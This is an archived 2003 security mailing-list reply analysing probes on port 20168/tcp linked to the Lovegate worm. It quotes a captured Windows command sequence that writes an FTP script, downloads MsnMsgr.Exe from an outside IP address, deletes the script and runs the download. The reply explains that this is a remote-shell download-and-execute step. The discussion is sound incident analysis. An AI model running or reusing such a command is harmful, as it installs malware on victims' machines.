Re: New Worm or Worm Variant?

From: Juri Haberland (juri_at_koschikode.com)
Date: 12/11/03

  • Next message: Harlan Carvey: "Re: Strange services.exe file" 
    Date: Thu, 11 Dec 2003 15:15:01 +0100
To: Charles Hamby <fixer@gci.net>

    Charles Hamby wrote:
    > I've been seeing a jump in 20168/tcp scans over the past week or so.
    > This port is commonly associated with the Lovegate worm. I recently
    > set up a port listener using Netcat to capture any output from probes
    > against a couple of my systems. Shown below are the results:
    >
    > echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll &
    > echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get
    > MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll &
    > del wxtu.dll & start MsnMsgr.Exe

    [SNIP]

    > At first glance it looks like some sort of non-interactive FTP
    > session to download an exploit (MsnMsgr.Exe), but Googling for
    > wxtu.dll came up empty (so this could be anything from a real .dll to
    > a renamed executable in my mind). A couple of questions for the
    > world at large:

    [SNIP]

    > 2) Any theories on wxtu.dll? Since I can't get a hold of the malware
    > to analyze it, I'm really guessing at this point. MsnMsgr.Exe seems
    > to be the exploit itself, it it appears to be using something like
    > FTPCOM to do a non-interactive FTP session, but wxtu.dll could be
    > anything from a real .dll file to a renamed executable. Ideas?

    My theory is as follows:
    Something on the target machine (whatever it was - possibly some kind of
    worm) opened port 20168/tcp and bound a shell to it. What you are seeing
    is someone connecting to this remote shell issuing some commands. These
    commands echo some ftp commands into an previously not existing file
    called wxtu.dll, then running ftp in non-interactive mode to download
    MsnMsgr.Exe, which might be just something like BackOrifice, and then
    deleting the wxtu.dll file.

    So the wxtu.dll file is just a text file created by the commands that
    you captured - the real problem is: what opened port 20168/tcp on that
    machine?

    Cheers,
    Juri

    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------

  • Next message: Harlan Carvey: "Re: Strange services.exe file"

    Relevant Pages

    • Re: [SLE] Firewall problems
      ... > I need to redirect the external port 22 to a server under the subnet I ... > am trying to user this command on Susefirewall2 but it doesn´t work out. ... If it is active ftp, ... For additional commands send e-mail to suse-linux-e-help@suse.com ...
      (SuSE)
    • Re: How to Create a TCP/IP PrinterPort on a MS Cluster 2k3 via Scr
      ... thus the creation of the port on the node. ... Download the Windows Server 2003 resource kit and add prnadmin.dll to the ... Do you actually think I would post these scripts if it didnt work? ... In your response include the commands you used. ...
      (microsoft.public.windows.server.clustering)
    • Re: GPRS dial up in Windows CE
      ... Use an application such as hyperterminal to send AT commands to your GSM ... the COM port that connects to your GSM. ... APN is depending on your sim: ... Uncheck Force long distance ...
      (microsoft.public.windowsce.platbuilder)
    • Re: telnet on port 25
      ... I think you can send some commands to send messages through the smtp server. ... > using port 25. ... I have never connected on port 25 using telnet ... > contact the sender using an alternative means of communication. ...
      (AIX-L)
    • Re: WIP: ATA to CAM integration
      ... HBA and a device through the Port Multiplier. ... "Since queued commands result in two different operations (command issue, ... to the command list that target a single port behind the Port Multiplier, ...
      (freebsd-current)